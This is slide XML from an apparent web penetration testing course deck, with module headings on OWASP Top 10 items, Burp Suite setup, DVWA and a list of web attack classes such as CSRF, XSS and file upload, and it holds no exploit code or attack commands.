              </a:rPr>
              <a:t>3 Modules</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="5400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2947E2A2-80C5-4050-946D-2423EA7FB990}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1067392"/>
            <a:ext cx="1292103" cy="711905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="108000" rIns="108000" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="7200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="7200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:alpha val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABEF3D05-DBED-477E-AB55-60CAC33E919F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7151475" y="1056306"/>
            <a:ext cx="3841271" cy="267057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="108000" rIns="108000" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>INTRODUCTION</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ED9CA4B-818D-4FC2-B606-12A65F5454AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7361977" y="1355011"/>
            <a:ext cx="3647840" cy="1893339"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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Introduction to Web Application Penetration Testing</a:t>
            </a:r>
          </a:p>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Attack Lifecycle</a:t>
            </a:r>
          </a:p>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An overview of the OWASP Top 10 Web Vulnerabilities List</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE430930-E28C-4495-AA16-BE8B4280B144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6206836" y="3744440"/>
            <a:ext cx="4913817" cy="2288178"/>
            <a:chOff x="756138" y="1100479"/>
            <a:chExt cx="4913817" cy="1200329"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4042D83-6D94-4C7D-AF7E-6001991A5C32}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="756138" y="1100479"/>
              <a:ext cx="1292103" cy="1200329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="108000" rIns="108000" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="r"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="7200" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="7200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="Group 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ABA2892-A556-4744-9932-E2E0F8642398}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1820947" y="1116283"/>
              <a:ext cx="3849008" cy="1076044"/>
              <a:chOff x="950509" y="1188076"/>
              <a:chExt cx="3849008" cy="1076044"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="TextBox 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F5094A-1E53-4834-909E-E39252592B06}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="950509" y="1188076"/>
                <a:ext cx="3841271" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="108000" rIns="108000" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>BURP SUITE</a:t>
                </a:r>
                <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="TextBox 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80265188-9BE9-4313-A539-6528A964AACD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1151677" y="1343838"/>
                <a:ext cx="3647840" cy="920282"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>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Introduction to Burp Suite</a:t>
                </a:r>
              </a:p>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Download and Install Burp Suite Community</a:t>
                </a:r>
              </a:p>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Burp Suite Tools</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="171459" indent="-171459">
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="Ø"/>
                </a:pPr>
                <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3784989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FEF80-311A-E136-B6B0-0EAF31C046B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7C6DB7E-38DD-719A-EABE-930F85A8061D}"/>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A7E4AEF1-5EEB-69D7-5C4B-B366DB2D16E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323529" y="339509"/>
            <a:ext cx="11573197" cy="724247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A09: SECURITY LOGGING AND MONITORING FAILURES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2" descr="Sucuri Guides - What is Broken Access Control, Broken vs Access Control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0CDA7DB-6608-2838-60A5-23BEFA2A82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8194" name="Picture 2" descr="What Are the OWASP Top 10 Vulnerabilities (And How to Mitigate Them)?">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23EEE998-05C2-CC8F-9AA0-CE55969A6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88" y="1571624"/>
            <a:ext cx="10402990" cy="363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058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8C310-DD8B-18FD-7833-F99BD8EF5A8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E7014D8-7FBB-4DB9-4875-AD702E36710D}"/>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EDFFC683-FB73-E6D7-1EC0-B0D4E3016B8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323529" y="339509"/>
            <a:ext cx="11573197" cy="724247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A10: SERVER-SIDE REQUEST FORGERY (SSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 2" descr="Sucuri Guides - What is Broken Access Control, Broken vs Access Control">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{207E2F0C-640F-3A26-1F2B-08D8FECAF4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1026" name="Picture 2" descr="What is server-side request forgery (SSRF)? | Invicti">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4230B352-6EC0-7040-DE9E-AC9733A1E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096" y="1403265"/>
            <a:ext cx="7239008" cy="487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502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Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC96783-1E6F-4F45-9BAF-6813B741F307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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FEF4DF0-D68B-E645-B133-CCF8A6A8B3CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6953984" y="2756105"/>
            <a:ext cx="4775028" cy="1477328"/>
            <a:chOff x="6566433" y="2749602"/>
            <a:chExt cx="4919865" cy="1477328"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2900A0E2-4CF2-10FC-37EE-E9FCC8068A67}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6665543" y="2749602"/>
              <a:ext cx="3051768" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="4800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Module 2</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4800" b="1"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F7DBEFDC-7468-D497-8BF3-1E402FE97891}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6566433" y="3765265"/>
              <a:ext cx="4919865" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Burp Suite</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3319232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EBEBE-9EC3-79E6-434B-88CB1237E418}"/>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B93FAE27-511E-6C94-0958-FA5B2C59E78A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HOW WEB WORKS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="How The Web Works - Learn.co">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57553B83-948F-C969-9F13-D051CDEDF60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847462" y="1511559"/>
            <a:ext cx="7933808" cy="474709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942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EBEBE-9EC3-79E6-434B-88CB1237E418}"/>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B93FAE27-511E-6C94-0958-FA5B2C59E78A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INTRODUCTION TO BURP SUITE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Burp Suite for Pentester – Configuring Proxy - Hacking Articles">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BDE05C5-C0B9-87C2-A69B-3C4186C419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412" y="2101771"/>
            <a:ext cx="11161175" cy="3244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708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EBEBE-9EC3-79E6-434B-88CB1237E418}"/>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B93FAE27-511E-6C94-0958-FA5B2C59E78A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET REQUEST VS GET RESPONSE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Get Request">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F2D2C5-DE35-1AB4-C22D-2CEB75825A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513" y="1177181"/>
            <a:ext cx="5905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ponse">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6999D252-4AEC-28CC-87B2-3C237C72DA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327" y="4174753"/>
            <a:ext cx="67056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8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EBEBE-9EC3-79E6-434B-88CB1237E418}"/>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B93FAE27-511E-6C94-0958-FA5B2C59E78A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1829456" y="628130"/>
            <a:ext cx="8533088" cy="724247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BURP SUITE COMMUNITY DOWNLOAD AND INSTALL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="The best Download Speeds memes :) Memedroid">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19552AE6-C149-68DE-F4CE-7477D2969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5060" y="3572691"/>
            <a:ext cx="2513540" cy="31510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reating a Comprehensive Guide to Burp Suite: A Step-by-Step Tutorial for  Web Application Security">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EA0F33A-10CB-53DF-BA19-3CA992F42C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2433241"/>
            <a:ext cx="3962400" cy="199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077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13784-E544-F039-BBF2-9C0F6CC93B28}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Why Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E325BE0-A59F-B6AC-1A4E-4B835D375CC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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03D9A40-1B0E-B52B-DB16-A69363E5E1CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6953984" y="2756105"/>
            <a:ext cx="4775028" cy="1661994"/>
            <a:chOff x="6566433" y="2749602"/>
            <a:chExt cx="4919865" cy="1661994"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CA013CA-9A72-4953-48B8-1782C40ECDC7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6665543" y="2749602"/>
              <a:ext cx="3051768" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="4800" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Module 3</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4800" b="1"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D9072903-2B1B-32F1-18C3-53E9BDEF0B07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6566433" y="3580599"/>
              <a:ext cx="4919865" cy="830997"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DAMN VULNERABLE WEB APPLICATION (DVWA)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1239709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WEB EXPLOITATION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2130FA05-35BE-697F-5550-7CD3590B2963}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="585495" y="1689040"/>
            <a:ext cx="11423197" cy="326698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CROSS-SITE REQUEST FORGERY (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>CROSS-SITE SCRIPTING (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>FILE UPLOAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
